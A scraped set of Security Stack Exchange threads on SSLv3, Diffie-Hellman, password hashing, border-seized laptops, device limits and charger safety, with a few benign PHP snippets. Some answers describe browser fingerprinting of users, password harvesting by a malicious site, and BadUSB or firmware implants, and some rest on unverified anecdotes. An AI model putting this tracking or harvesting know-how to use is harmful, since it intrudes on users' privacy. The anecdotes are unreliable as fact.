If you disable SSLv3 on your site, then older browsers that do not support TLSv1 or higher will not be able to connect to your site by SSL/TLS. Having said that, SSLv3 has been deprecated for some time, thanks to POODLE . As a result, many web sites that employ SSL/TLS have stopped supporting SSLv3 for a while now. So, users that are still using older browsers that do not support TLSv1.0 or higher are likely to be having problems connecting to many sites by SSL/TLS (in addition to yours if you've disabled SSLv3). In fact, in addition to the payment card industry (PCI) requiring sites that accept card information to disable SSLv3 - they are in the process of mandating that these sites phase out support for TLSv1.0 as well . Soon, all sites that accept card information will be required to support TLSv1.1 or higher. Edit: See this Wikipedia page for a good reference on SSL/TLS protocols supported by various browsers.
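On Apache the server-side change is typically a mod_ssl directive along the lines of SSLProtocol all -SSLv3. If you want to verify the result from the outside, a rough PHP probe like the following (the hostname is a placeholder) attempts an SSLv3-only handshake; note that a modern PHP/OpenSSL build may itself refuse SSLv3, in which case the probe tells you nothing about the server.

<?php
// Rough self-test (hypothetical hostname): attempt an SSLv3-only handshake
// against your own server. Caveat: if the PHP/OpenSSL build running this
// script has SSLv3 compiled out, the handshake fails locally and the result
// proves nothing about the server.
$host = 'www.example.com';

$ctx  = stream_context_create(['ssl' => ['verify_peer' => false, 'verify_peer_name' => false]]);
$sock = @stream_socket_client("tcp://$host:443", $errno, $errstr, 10, STREAM_CLIENT_CONNECT, $ctx);
if ($sock === false) {
    die("TCP connect failed: $errstr ($errno)\n");
}

$ok = @stream_socket_enable_crypto($sock, true, STREAM_CRYPTO_METHOD_SSLv3_CLIENT);
echo $ok
    ? "SSLv3 handshake succeeded - the server still accepts SSLv3\n"
    : "SSLv3 handshake failed - the server (or this client) refuses SSLv3\n";
fclose($sock);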
{ "source": [ "https://security.stackexchange.com/questions/105270", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91690/" ] }
105,339
I have recently started to make use of a password manager and good password practices. I have a different password for each site that I use. If I accidentally use the password from another site when logging in to a webpage, should I consider the password compromised and change it? E.g. If my password for www.example.com was passwordOne And my password for www.ejemplo.com was contraseñaUno And I accidentally try to log into www.example.com with password contraseñaUno Would I need to update the password for www.ejemplo.com? I can see a similar but different question here , but that relates to the password being entered into the username field.
Just to play the devil's advocate... You are as likely to be compromised as if you were using the same password on both sites*. As most people have pointed out, you probably don't have to worry. Not so much because a website cannot tell the difference between a good and a wrong password, but rather because most websites that you will visit will likely not log your password. The reason is simply that it provides no value to them. Most websites are there to do legitimate business and hence see no value in being malicious by recording every password entered. Still, if I had evil intentions and wanted to gather many possible passwords, hosting a service online to gather passwords would probably be a better alternative than trying to brute force every possible combination. Catching all passwords, even bad ones, is not a bad idea if you are hosting that kind of "service". Users that have multiple passwords are very likely to enter the wrong password on the wrong site, hence logging bad attempts as well as good attempts is a good attack plan. For example, consider this quote from https://howsecureismypassword.net/ : "This site could be stealing your password… it's not, but it easily could be. Be careful where you type your password." It puts things in perspective. Also, is such an evil "service" so unlikely? It's hard to say, but for sure it's nothing new: https://xkcd.com/792/ Note*: Well, I did say "as likely" but it's not exactly true. By using the same password on many sites you are not only vulnerable to malicious sites but also to the incompetence of site owners. Many websites still store your password in plaintext in their database or use weak hashing, which means that if an attacker is able to steal their database your password is compromised.
{ "source": [ "https://security.stackexchange.com/questions/105339", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87864/" ] }
105,360
I flew from overseas back to the USA and all my electronic equipment was seized by Homeland Security, including my laptop computer, external hard drives, flash drives, etc. After more than a month I have finally gotten my stuff back. I have 2 questions: Is it known whether Homeland Security has ever planted spyware, viruses, tracking devices, etc. on seized computers? What should I look for, what steps should I take to sanitize my stuff, what would you do? EDIT: I can't reformat, burn hard drive, etc. as some have suggested because very important work is on the laptop, i.e. software I've been working on for over a year. Yes, I had backups of all my data. Unfortunately, the backups were all with me, and they seized all of those too (2 external hard drives, 3 usb flash drives). So merely utilizing backups isn't an option. Also, someone said people can't help me without breaking laws. I am unaware of any laws which state it is illegal to remove spyware/malware/viruses, or that it is illegal to remove anything the government put on your computer. EDIT: I guess I could rephrase the question as "how would you go about getting source code you had written (text files) off the computer safely, 'safely' meaning scanning text files to detect anything unusual, and then transmitting or somehow putting them on another computer?"
Given that your laptop was in possession of a government entity with unknown intentions towards you for an extended duration, there's really no way you can restore it to a fully trustworthy state. If you assume the U.S. DHS to be hostile, then the only secure process to move forward with includes: Assume all data on the laptop, and all other confiscated hardware, to be compromised. Change all passwords for accounts which may have been stored/cached on the devices. Change all passwords for other accounts which use the same password as the accounts which may have been stored/cached on the devices. Void all payment mechanisms which may have been stored/cached on the devices. Communicate appropriate privacy warnings to potentially-affected third parties. Assume the laptop, and all other confiscated hardware, was modified to allow future collection of data, or control of the system, by U.S. DHS or related agencies. Destroy the devices. Do not capture any backup images or copy any files. Just burn/shred/pulverize/crush them as-is. Purchase replacement hardware/software from a trusted source, through a trustworthy supply chain, and re-build from scratch. If trustworthy backups exist (backups which were not also confiscated, and would not be remotely accessible with credentials that may have been stored/cached on confiscated devices), restore data from those sources as needed. Anything short of this leaves open several extremely undesirable possibilities: U.S. DHS may continue to have access to your online accounts and/or financial resources. One or more of your devices may have persistent malware which allows U.S. DHS, or related agencies, to spy on you or control your systems. And you're back to #1. Files stored on one of your devices may have malware which will install itself upon opening. Then see #2. Hardware or firmware on one of your devices may have been modified to include malware, which may install itself upon connection to another device. See #2 again. Any software projects you were working on, and/or the tools you use to compile them, may have been modified to include malware. Back to #2 again, and also add further impact to your customers if it's not discovered and dealt with before distribution. You should check out the 10 Immutable Laws of Security . Law #3 certainly applies. Assuming they've exploited that law, you can probably bet Laws #1 & #2 also apply. Law #1: If a bad guy can persuade you to run his program on your computer, it's not your computer anymore Law #2: If a bad guy can alter the operating system on your computer, it's not your computer anymore Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore Also check out the 10 Immutable Laws of Security Administration . Here, Law #4 is most apropos. Law #4: It doesn't do much good to install security fixes on a computer that was never secured to begin with
{ "source": [ "https://security.stackexchange.com/questions/105360", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91785/" ] }
105,625
Below is a proposal for dealing with a situation of website security. I am wondering whether it seems feasible, from both a technical and usability point of view. I want to make sure that the proposal does contain any glaring errors. The website The website in question is a school website where students may purchase various items. These students get an account on the website with a username and password, which they can use to login. Once they login, they have access to protected pages with private content which are unavailable to the public at large. The security concern The owners of the website wish to prevent a situation where a single student signs up on the website, obtains a username and password, and then circulates those credentials to a circle of friends who are then able to login to the website and illegally view the private content. The solution The central idea we have come up with to deal with this security problem is to permit each student to login to the website on two devices only. Once a student logs in on two different devices, they are restricted to those two devices. If they then attempt to login on a third device, the system would simply not permit them to do so. It is our understanding that other websites offering private content, such as Netflix, use such an approach. Implementation Two ideas come to mind to implement the above security measure: IP address and cookies. We rule out IP addresses which can change, and choose cookies. Websites such as amazon.com allow their customers to login once, and then whenever they return to the website, they are always recognized. This is almost certainly achieved through cookies. Thus each time a student logs in, we will store on their device a cookie. And we will also store this cookie in our database under that student's account. Thus each time a student logs in on any device, we will check whether the device they are currently logging in on contains the cookie we have stored for that student. If it does not, we will know that the student is logging in on a different device. We will thus be able to know how many devices the student is trying to login on. Drawbacks We have identified at least three possible drawbacks to this approach: Clearing cookies. People can, for a variety of reasons, choose to clear the cookies from their computer. A bona fide person may occasionally not have access to their usual device, and wish to login on a different computer. People do purchase new devices from time to time. These are examples of situations where a bona fide user, for legitimate reasons, wishes to login, but will be unable to, due to the website's security restriction of two devices. We have some ideas as to how to build logic into the system to deal with such situations, which we may implement in the future, but for the time being, we feel that such situations are sufficiently rare that we do not need to handle them programmatically. Rather, for now, in the event that a student is locked out, they will get a screen with a message explaining why we have not allowed them into the system, and a button which they can click on which will automatically generate an email to the site administrators. The email will inform them that a student wishes to login on a third device. The administrators can then contact the student, and if they are satisfied that the need is bona fide they will be able to take steps from the CMS to allow that student in. 
The size of the student body is sufficiently manageable that the above approach should be feasible. Fair warning We will inform the students of these security measures when their account is activated in order to prevent unpleasant surprises.
What you are trying to do is futile. Information cannot be contained. You cannot prevent someone from passing on information. When they cannot share their logins, they just copy & paste the text. When you disable copy & pasting (the common methods to do this can be easily bypassed, by the way), they will make screenshots. When you find some way to make screenshots impossible (I couldn't think of any), they will read it to each other. All you will achieve is impairing the user experience for legitimate users without really preventing abuse. But if you really want to go down that route, you might look at other ways of browser fingerprinting than IP address and cookies. There is a lot of other information a web browser transmits on every page request, and often it is sufficiently unique to identify a user. The Electronic Frontier Foundation has an interesting demo with their Panopticlick website. Among the techniques used are: the UserAgent string (browser self-identification), HTTP_ACCEPT headers, installed plugins and their version numbers, installed fonts, timezone, screen size and color depth, and alternative cookie techniques (localStorage, persistent storage in plugins like Flash). Keep in mind that all these identification methods are prone to false negatives because many of them can change at any time. You should only consider a fingerprint as coming from a new device when multiple properties change drastically at the same time. When the difference from the previous device profile is minor, you should silently update the device fingerprint instead.
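As a very rough sketch of the server-side half of such a fingerprint - the client-only properties (screen size, fonts, plugins) would have to be collected with JavaScript and posted back, which is omitted here - you could hash the headers PHP already sees on each request:

<?php
// Server-side half of a device fingerprint: hash the headers the browser
// sends on every request. Screen size, fonts, timezone etc. would need to be
// collected client-side and submitted separately; they are omitted here.
function requestFingerprint(): string {
    $parts = [
        $_SERVER['HTTP_USER_AGENT']      ?? '',
        $_SERVER['HTTP_ACCEPT']          ?? '',
        $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '',
        $_SERVER['HTTP_ACCEPT_ENCODING'] ?? '',
    ];
    return hash('sha256', implode('|', $parts));
}

// Compare against the fingerprints already stored for this student, and treat
// only a large combined difference as a genuinely new device.
$current = requestFingerprint();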
{ "source": [ "https://security.stackexchange.com/questions/105625", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92036/" ] }
105,731
Let's say "Alice" and "Bob" want to communicate with each other over an insecure network. Using Diffie–Hellman key exchange, they can get the same symmetric key at last. However, as I understand, they do not have to get the same symmetric key at all, because they can just use asymmetric key without key exchange. With RSA algorithm, Alice and Bob can just share their public keys ( public_a , public_b ) and keep their private keys ( private_a , private_b ). Alice can just send Bob the messages which are encrypted by public_b , and Bob can decrypted it by private_b . They can still communicate over an insecure network, without Diffie–Hellman key exchange at all . I know I might be wrong, but I'm not sure where I was wrong. Does anyone have ideas about why and when Diffie–Hellman key exchange (or any key exchange) is necessary? Is it suitable for the situation I mentioned above?
If the attacker is able to passively capture data and later gets access to the private key of the certificate (e.g. through theft, a Heartbleed-style attack, or law enforcement), then the attacker could decode all previously captured data if the encryption key is derived only from the certificate itself. DH key exchange makes it possible to create a key that is independent of the certificate. This way, knowledge of the certificate alone is not enough to decode previously captured data. This is called forward secrecy. See Wikipedia for more information. Apart from getting forward secrecy with DH, there are other reasons to use symmetric cryptography instead of simply using the RSA private keys. Thus, even if you don't use DH for the key exchange, TLS will still create a symmetric key, which is then derived from the certificate. For more details on why using the private key directly to encrypt is not a good idea, see Why does PGP use symmetric encryption and RSA?
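To see why the exchanged secret does not depend on the certificate's key, here is a toy walkthrough in PHP with deliberately tiny, insecure numbers (real TLS uses 2048-bit groups or elliptic curves); the certificate only signs such an exchange, it never enters the computation.

<?php
// Toy Diffie-Hellman with tiny numbers, purely to illustrate the idea.
// The certificate's RSA key never appears below, which is why stealing it
// later does not reveal old session keys.
function powMod(int $base, int $exp, int $mod): int {
    $result = 1;
    $base %= $mod;
    while ($exp > 0) {
        if ($exp & 1) {
            $result = ($result * $base) % $mod;
        }
        $base = ($base * $base) % $mod;
        $exp >>= 1;
    }
    return $result;
}

$p = 23;                        // public prime modulus
$g = 5;                         // public generator
$a = random_int(2, $p - 2);     // Alice's ephemeral secret
$b = random_int(2, $p - 2);     // Bob's ephemeral secret

$A = powMod($g, $a, $p);        // Alice sends A over the wire
$B = powMod($g, $b, $p);        // Bob sends B over the wire

$aliceShared = powMod($B, $a, $p);
$bobShared   = powMod($A, $b, $p);

// Both sides compute the same secret without it ever being transmitted.
echo $aliceShared === $bobShared ? "shared secret: $aliceShared\n" : "mismatch\n";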
{ "source": [ "https://security.stackexchange.com/questions/105731", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92148/" ] }
105,736
As a programming exercise I need to decrypt a message. The only clues that I have are these: the encoded message contains only Base64 characters; an n-letter sequence (n in 1,4,7,10) returns an encrypted message ending with "=="; an n-letter sequence (n in 2,5,8,11) returns an encrypted message ending with "="; and an n-letter sequence (n in 3,6,9,12) returns an encrypted message without that character. I do not want a solution, I am just wondering whether this pattern of occurrences of the equals sign provides a clue or not.
The = signs relate to the length of the string being encoded in Base64 . Essentially, in probably the most common form of Base64, = is used as a padding character to ensure that the last block can be decoded properly. Base64 is not encryption - there is no hiding going on in it - but is often used to allow for binary data to be sent in text only form. All the characters used in Base64 will paste correctly, and can be entered using a keyboard with no modifier keys beyond shift.
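A quick way to see the pattern the question describes is to Base64-encode inputs of increasing length, for example in PHP:

<?php
// Demonstration of how the padding tracks input length modulo 3.
foreach (range(1, 6) as $n) {
    $encoded = base64_encode(str_repeat('A', $n));
    printf("%d byte(s) -> %-10s (%d padding '=')\n",
           $n, $encoded, substr_count($encoded, '='));
}
// 1 byte(s) -> QQ==       (2 padding '=')
// 2 byte(s) -> QUE=       (1 padding '=')
// 3 byte(s) -> QUFB       (0 padding '=')
// ...and the pattern repeats every 3 bytes, matching the 1,4,7,... / 2,5,8,... / 3,6,9,... groups.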
{ "source": [ "https://security.stackexchange.com/questions/105736", "https://security.stackexchange.com", "https://security.stackexchange.com/users/30741/" ] }
105,823
That is to say, in what cases does it make sense to commit an unencrypted keypair to internal source control like SVN or Git? Related question that discusses an encrypted private key: Is it bad practice to add an encrypted private key to source control?
When the private key is nothing more than a test fixture used to test some process requiring a private key and where the private key is not actually used to secure any system. In some cases it can be appropriate to commit an encrypted key. For example if the repository is public/open source but a Continuous Integration system requires access to that file - Travis CI supports this . Otherwise you shouldn't commit private keys.
{ "source": [ "https://security.stackexchange.com/questions/105823", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78278/" ] }
105,836
It's quite well known that if an attacker wanted to, they could spoof their IP address by using a proxy server or some other means. Whilst that's possible, whenever I perform a geo-location lookup on the IP addresses that conduct automated brute force attacks, probing, port scanning etc. against my servers, almost always the IP addresses resolve to countries associated with cyber crime, like China, the USA, Russia, Turkey, Italy, etc. Knowing that the Internet is very independent of geography - for example, it's possible to sign up with server hosts anywhere in the world - it would in fact be desirable, from an attacker's point of view, that their IP was not associated with a country with a bad reputation. Also, because servers are sometimes added to a botnet when compromised, I always assumed remote servers were the preferred "weapon of choice" for attackers. However, I'm now wondering - are the people conducting this activity forced to use local ISPs in countries with more lax laws that don't crack down on malicious activity (I'm assuming they can't get access to all the big-name reputable providers, because their accounts would be shut down quite quickly)? And does this also mean that they generally have to supply their own machines? I know there are lots of ways to set up a computer and connect to the Internet - but what is the typical setup for these automated bots: are they remote rented servers or local physical machines, and how do they get Internet access?
{ "source": [ "https://security.stackexchange.com/questions/105836", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73523/" ] }
106,022
A couple of days ago I was having a conversation using Skype, and I wanted to share a link to a page with the interlocutor. I didn't want to let her understand the link content by just looking at the URL, so I shortened it with Google's shortening service and then sent her the link. The service lets me know how many times the link has been clicked (also telling me the referrer and the browser). I noticed immediately that someone located in the U.S. clicked the link (identifying as Chrome, with www.google.co.in as referrer). (Firefox clicks are mine.) I asked the interlocutor if she clicked the link (even though we're in Italy she may have some strange network configuration), but she assured me that she didn't. Should I suppose that someone is spying on my Skype conversations? Update 1 - Unshared links details I just noticed that 9 days ago I created a link with the shortener but did not share it with anyone; only I clicked it, and this is the result in the Google charts: So can I exclude that the link I shared on Skype was visited by Google (if it was, why is this unshared link not visited by anyone?), or at least conclude that if Google visits it they don't show their visit in the Details page? (I have more than one link that was generated and not shared, and none of them show visits by Google or anyone else except me.) Update 2 - All the shared links are visited by someone who shouldn't! I also noticed that all the links I shared over Skype in the last 2 weeks have been visited at least once by a Chrome browser (with a Google referrer); the most peculiar is this: total visits are 5, one is mine (the only Firefox), another one (with Chrome) is the click done by the Skype interlocutor (I'm pretty sure that she visited it just one time because the count of visits from Italy is 2 - my click and hers). Who made the remaining visits? If it was Microsoft, why are the referrers www.google.com.br and www.google.com, and why does the browser identify as Chrome? Update 3 - About Skype URI preview @Ankit Sharma said that it is possible that the Skype URI preview functionality is looking at the link I shared, so I wrote a simple C# program to check this; here is the code: var request = (HttpWebRequest)WebRequest.Create(theURL); request.UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5"; // This is the UserAgent he wrote in his answer var response = (HttpWebResponse)request.GetResponse(); using (var sr = new StreamReader(response.GetResponseStream())) sr.ReadToEnd(); I ran this code and then checked the Details, but it didn't record anything. To check if my program was buggy I tried changing the UserAgent to Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16 (taken here) and reran it, then I checked the Stats and it is now showing an Opera click. So I think that it is not Skype's "functionality" that causes the suspicious clicks to appear.
Given the information you have provided I'd say that it's google shortener visiting the url to check it for security purposes: " Our spam detection algorithms are automated, and routinely disable suspicious goo.gl short URLs " see here . Back in 2013 it came out that Microsoft monitors skype conversations for HTTPS urls. It then visits these urls purportedly for " preventing spam, fraud or phishing links " ( more info here , or on google), so regardless you need to be aware that skype is not suitable for secure text conversations. UPDATE So I've just seen your updated information in your question. I'd still say that at some point known to themselves, something at google will probably hit the URL, either for indexing or security. However thinking about it I wouldn't have expected any of the google's own crawlers/bots to appear in their own statistics; as they're not clicks and they wouldn't want to affect the statistics they present you with, and the bot(s) would visit the destination of the shortened URL, not the shortened URL itself. If the original shortened URL led to a system under my control I'd now be looking for web server log files to see what requests have been made. There's always the possibility that there's something else on your machine, or on the machine of the person you sent the URL to, which is responsible for the activity. That could either be something benign or not. Another thought is that since 2013 Microsoft have changed how their spam preventing system works, but I can't see it having a chrome user agent string!
{ "source": [ "https://security.stackexchange.com/questions/106022", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92434/" ] }
106,026
Currently my project still uses MD5 hashing to encrypt passwords. Yeah, I know. I'm planning to update the password system to use the newer password_hash and password_verify functions in PHP, which will improve the security of the users' passwords. However, my moderator team has voiced a concern: since one of our core rules prohibits users from having more than one account, they need ways to tell if two accounts belong to the same person. One such way that they have used is to check if the MD5 hashes are the same on the two suspect accounts - if so, then the accounts have the same password and suspicion intensifies. But with the proposed new system, this will no longer be possible because different hashes will be produced on the two accounts. In the interest of finding a compromise, is there any way to use the better security of password_hash , while still providing a way for the moderator team to detect when two accounts share the same password? My thoughts at the moment involve hashing the password in some other way that will produce the same hash for the same password, but I'm worried that this will re-introduce the same vulnerability that we're trying to escape by moving away from MD5. Are there any options here or will I have to use Executive Decision Power to overrule the concern?
One of the reasons that password_hash produces different results for the same password is to prevent information leaks and make passwords harder to crack if the hashes are obtained by an attacker. You really don't want to compromise this security feature - not only will it be less protection for customer data but you will also be rolling your own solution rather than using well supported and accepted solutions. Using identical password to detect multiple accounts by the same account holder is a bad idea anyway - it is bound to cause false positives and result in you blocking legitimate accounts.
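A common migration path - sketched here with a hypothetical $pdo handle and users table - is to keep verifying the old MD5 hash until each user's next successful login and re-hash with password_hash() at that moment:

<?php
// Transparent migration sketch: verify against the legacy MD5 hash once,
// then immediately re-hash with password_hash(). The $pdo handle and the
// users table/column names are hypothetical.
function login(PDO $pdo, string $username, string $password): bool {
    $stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);
    if (!$user) {
        return false;
    }

    $stored = $user['password_hash'];
    $legacy = (strlen($stored) === 32 && ctype_xdigit($stored)); // looks like raw MD5

    $ok = $legacy
        ? hash_equals($stored, md5($password))
        : password_verify($password, $stored);

    if ($ok && ($legacy || password_needs_rehash($stored, PASSWORD_DEFAULT))) {
        $upd = $pdo->prepare('UPDATE users SET password_hash = ? WHERE id = ?');
        $upd->execute([password_hash($password, PASSWORD_DEFAULT), $user['id']]);
    }
    return $ok;
}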
{ "source": [ "https://security.stackexchange.com/questions/106026", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
106,039
I recently took a business trip to China. Our IT department told me I could not take my normal machine, and instead gave me a loaner. This loaner had MS Outlook and was linked to my normal company e-mail account. I logged into the corporate network using the same VPN and token (Mobile Pass on my iPhone) that I would have used had I taken my normal machine. I should note that I did take my normal iPhone, not a loaner. The primary difference from the normal machine seems to be that upon my return, the loaner would be reimaged, and presumably used as a loaner on the next trip someone took. I was never asked not to place the loaner on the company network on my return, and I never tried so I do not know if it would connect to the network or not. There were also no restrictions on moving files from the loaner onto my normal machine. I also used my normal logins on the loaner (user id, passwords, etc.). My question is: does this loaner laptop policy provide significant security benefit over taking the user's normal machine? Follow up edit: and does the fact the destination is China, versus, say a location in Europe or the US make a difference?
I recently took a business trip to China. Our IT department told me I could not take my normal machine, and instead gave me a loaner. That may not have helped you at all. The reason I'm saying this is because you connected that laptop to the corporate network after you brought it back to your country. This loaner had MS Outlook and was linked to my normal company e-mail account. I logged into the corporate network using the same VPN and token (Mobile Pass on my iPhone) that I would have used had I taken my normal machine. I should note that I did take my normal iPhone, not a loaner. You shouldn't ever reconnect that computer to your corporate network. You need a clear separation of concerns. International Corporate Espionage and You Do you have a company that does important business in China? You may have been hacked on arrival . Unfortunately, since you also connected to the corporate email and other accounts, you may have had all of your email addresses and contacts exfil'd . Why would they need that information? For phishing attacks, for information on clients, contacts, et al. Unfortunately, most of the hotel internet service that I've encountered have had significant problems with their login portals, such as drive-by-download exploits in Javascript, Flash, and Java. If you had any of those enabled, and your machine was vulnerable, then it's quite possible you're infected without realizing it. I've personally come across hotel WiFi that "doesn't work," which requires "IT staff" in the hotels who will personally come in and set up your connection properties ( IPv4 , IPv6 , DNS , et al) to connect through a malicious server. Sometimes they even try to download files on my laptop while "fixing" it. Firmware attacks are possible The primary difference from the normal machine seems to be that upon my return, the loaner would be reimaged, and presumably used as a loaner on the next trip someone took. Unfortunately, this won't help against firmware-based attacks. It can be as simple as inserting a BadUSB device when you're away. Walk in, insert, wait for confirmation of flashed hardware, leave. If you're working for a government contractor, or have important company secrets to protect, I wouldn't even trust a re-imaged drive. Full disk encryption doesn't protect you against flashed firmware, or even hidden device implants. They can simply turn on the laptop, insert a piece of media that contains malware, flash your bios without even touching the drive, and then install bios-based malware . But firmware attacks aren't absolutely necessary Did you leave the laptop alone in the hotel while you went shopping, or when to an important meeting? It may have been broken into physically while you weren't there. One good way to defend against this is by ensuring that your hard drive was encrypted, and then shutting it off when you're gone. But this isn't perfect either; they can physically implant things in your laptop faster than you think. You could also try placing few warranty/void seals on the laptop edges before visiting China. If they're broken, assume the hardware is compromised. Again, keep in mind that full-disk encryption won't save you from hardware-based attacks. If they copied your hard drive contents and then installed a hardware-based keylogger, then they could retrieve your hard-drive contents easily. What about my phone? Is it safe? Since you mentioned your phone in your post, I thought I'd add this little tidbit. 
It's possible to replace your phone's charging equipment with a malicious doppelganger while you're gone, or even while you're asleep. If you spend enough time in hotels, you may run even into hotel employees who actually enter your hotel while you're asleep. Even if you've bolted the doors and locked them. Should I connect to my normal corporate network while in China? I was never asked not to place the loaner on the company network on my return, and I never tried so I do not know if it would connect to the network or not. There were also no restrictions on moving files from the loaner onto my normal machine. I also used my normal logins on the loaner (user id, passwords, etc.). I would suggest that your IT Security staff spends a bit more time learning about foreign attackers. Using your normal logins is pretty much a huge no-no in China, or in any other high-risk area. Are there any security benefits of your laptop policy? My question is: does this loaner laptop policy provide significant security benefit over taking the user's normal machine? Nope. The reason is that you ended up connecting to your corporate network's VPN. I took a lot of disposable tech to China, and it ended up getting hacked every single time. I reformatted afterwards, and the infection persisted. Had I connected that to an important network where I had read/write access to critical things, I'd be in for a world of trouble. If you want an Advanced Persistent Threat spreading everywhere, go for it. Personally, I want all the infections so I can reverse-engineer them! :-) However, considering your company likely has secrets to protect, I would not trust this laptop policy. In fact, what you're describing - the way you used the computer - sounds like a goldmine to a skilled hacker, or even a script kiddie who can automate the attack. What would you do at this point if you considered your data breached? It could just be the early stages of a breach, getting the data ready for a phishing attack, or you might've had more important information available potential attackers. But what about the corporate VPN? Keep in mind, as I've stated several times, if you connected to your company through the corporate VPN, and someone in China or elsewhere infected your machine, then anything you're allowed to do on that corporate network is also accessible to them . Are you allowed to create/read/write critical files and folders? So could they. Again, whatever you're allowed to do on your corporate network, so can they if they control your computer. This could be done silently without you realizing it, even while you're on the system.
{ "source": [ "https://security.stackexchange.com/questions/106039", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91684/" ] }
106,049
A guide on this site on how to make a decent Certificate Signing Request (CSR) says that I should be using SHA-2 certificates to secure an HTTPS webserver. Are SHA-2 certificates considered obsolete or current for TLS/SSL website certificates (as of 20th November 2015)? If they are obsolete, what should I be using to secure TLS/SSL/HTTPS on my Apache2 webserver instead (as of 20th November 2015)? And where can I find an authoritative source of current information concerning deprecations of this sort?
"SHA-2" is the traditional codename for a family of six functions that includes SHA-256 and SHA-512. These functions are considered completely fine and current and non-obsolete. There is a newer family of functions called SHA-3, but it has been formally defined only very recently, and nobody really supports them yet. Moreover, SHA-3 is not formally defined as a replacement for SHA-2, but as an alternative . All the current fuss is about an older function called "SHA-1", not "SHA-2" (and most of the panic is greatly exaggerated).
{ "source": [ "https://security.stackexchange.com/questions/106049", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6103/" ] }
106,072
I have a smartphone that I often plug into a wall socket for charging via a small adapter that rectifies AC to DC and transforms the voltage from line level (120V or 240V) down to 5V DC, probably using a switching power supply. Standard stuff. I am concerned that if there is broadband on the power lines, for example powerline Ethernet, unwanted digital signals might be transmitted to my phone. I realize many say that the electrical transformer and rectifier would damp out any digital signals (for example, as explained in this post), but I believe that unless these high-frequency signals are specifically filtered, they will come through. I have had experience with noise in supply lines coming into test equipment unless we had very nice power supplies (see, for example, the explanation here). I am unsure my $5 wall charger is that nice. Does anyone have any data from testing, or more detailed specifications, on these wall chargers? Is this really a problem?
There is nothing stopping an attacker from putting a powerline ethernet transceiver as well as a USB-enabled microcontroller into a USB charger. This would allow them to communicate with the charger in the hope of offloading some malware onto a smartphone plugged into that port. However, such a device would need to be highly specialized and specifically designed for this purpose. There is simply no way that powerline ethernet could just magically transmit data over the USB data lines to a smartphone.

If you are at all afraid that something like this might be happening, there are products that exist specifically to prevent such a scenario. For example, the SyncStop:

SyncStop prevents accidental data exchange when your device is plugged into someone else's computer or a public charging station. SyncStop achieves this by blocking the data pins on any USB cable and allowing only power to flow through. This minimizes opportunities to steal your data or install malware on your mobile device.

You could also cut the cable open and physically disconnect the D+ and D- pins (which is effectively what the SyncStop does), and that will definitely stop all communication.

How it works

Powerline ethernet works by transmitting data on a high frequency over a building's mains power wiring. This is possible due to the fact that AC mains power uses either 50Hz, 60Hz or some other relatively low frequency. These devices transpose their data directly on top of the 120V/240V already present on the mains. You can read more about how this is actually done on a hardware level here.

Any wall charger that you find that is smaller than a baseball and weighs next to nothing is what is known as a switching AC to DC converter. These devices work by rectifying the mains power to DC, smoothing the rectified DC with a large capacitance, and then using a small transformer to switch the rectified DC at a very high speed (in the neighborhood of 100s of kHz to MHz). You can read more about them here.

Why it's not possible

To rectify the AC mains to DC, the charger uses either a full-wave or half-wave rectifier. These are just diodes; any signal present on the AC mains will also be present on the rectified DC, and the same can be said of the smoothing circuitry. Even if the signal present on the rectified DC was able to somehow make its way across the transformer, the switching circuit in the charger will cause quite large portions of that signal to be lost when the transformer is switched off. After the transformer, there is yet more smoothing circuitry that ensures the final output is as close to 5V as possible, meaning that even if some signal made it through the aforementioned gauntlet, it would be smoothed out into silky smooth 5V.

The above doesn't even consider how USB works. There are two data pins, D+ and D-. They form what is known as a differential pair, and they mirror each other. This means that any signal present on the 5V line would also need to be mirrored to ground in order for the USB transceiver on the phone to even bat an eye. Moreover, the USB specification includes packets, handshaking, and everything else you would expect from a high-speed protocol. I know what you are thinking: "Doesn't Ethernet also have packets and handshaking?" and yes, it does, but that's like saying a zebra is the same as a platypus.

So no, without modifying an off-the-shelf charger with some quite complicated hardware and software, it is impossible for this to happen.
{ "source": [ "https://security.stackexchange.com/questions/106072", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91684/" ] }
106,186
I am currently studying IT at college (UK college aka not University) and the coursework is boring me to death. I have been coding for quite a while now mainly in OO languages such as C# and Java but often get bored and give up quickly because the majority of it is boring UI stuff I hate doing, the projects I come up with rarely have much to do with code design and actually creating algorithms. I want to start writing my own algorithms of sorts and start moving away from the user friendliness side and start learning things that interest me, namely cryptography and compression. I want to write my own encryption algorithm, to encrypt the bytes of a file or string. I have a few questions: Where would I start with this, What books/materials are recommended for starting with cryptography? Do I need extensive cryptography knowledge to get started on a basic algorithm? Will C# be OK for putting an encryption algorithm into practice? Any help would be sincerely appreciated. I want to start writing code so when it comes to applying to uni, I have something to show for all of my bold claims on my application!
Of course you can start small and implement your own algorithms. But do not assume they provide any security beyond obfuscation. The difficult thing when it comes to cryptography is finding reasons why something actually is secure. You won't be able to decide that within months, and if you feel like you are at that point, you are most probably wrong. It is much easier to find reasons why things are insecure than reasons why they are secure, so if you want to start somewhere, develop your own algorithms until you think they are secure and then try to find out why they are not and find ways to attack them.

Most mistakes are made when implementing algorithms. So if you want to get a well-paid job, you could learn how to implement that stuff correctly. I would recommend starting by implementing something like AES, then continuing to different modes of operation like CBC or CCM and finding out why randomness is important. Continue with SHA-2 and HMAC and proceed to asymmetric cryptography. Always check what others did and why they did it, and have a special look at side-channel attacks and how they are performed. If you are at that point you will find your way to go on.

The reference to start with would be the "HAC", which is freely available online: http://cacr.uwaterloo.ca/hac/

